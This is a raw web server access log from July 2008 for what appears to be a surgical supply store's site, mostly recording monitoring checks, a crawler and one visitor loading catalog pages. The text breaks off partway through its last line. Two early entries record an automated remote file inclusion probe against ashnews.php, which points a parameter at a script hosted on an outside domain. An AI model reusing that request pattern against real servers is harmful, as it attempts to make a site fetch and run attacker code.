209.59.12.99 - - [15/Jul/2008:04:53:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.37.237.58 - - [15/Jul/2008:04:54:20 -0400] "GET /logs//ashnews.php?pathtoashnews=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
72.37.237.58 - - [15/Jul/2008:04:54:20 -0400] "GET //ashnews.php?pathtoashnews=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
66.249.73.25 - - [15/Jul/2008:04:56:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D64C189004025060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:04:58:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.58.205.41 - - [15/Jul/2008:04:58:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:58:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:58:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:58:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:58:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:59:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:59:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:59:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:04:59:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:05 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/bonemill.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:10 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:11 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:11 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:12 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:12 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:13 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:13 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:13 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:14 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:14 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:14 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:14 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:15 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:15 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:15 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MSN Optimized;ES; InfoPath.2; MSN Optimized;ES)"
80.58.205.41 - - [15/Jul/2008:05:00:15 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (com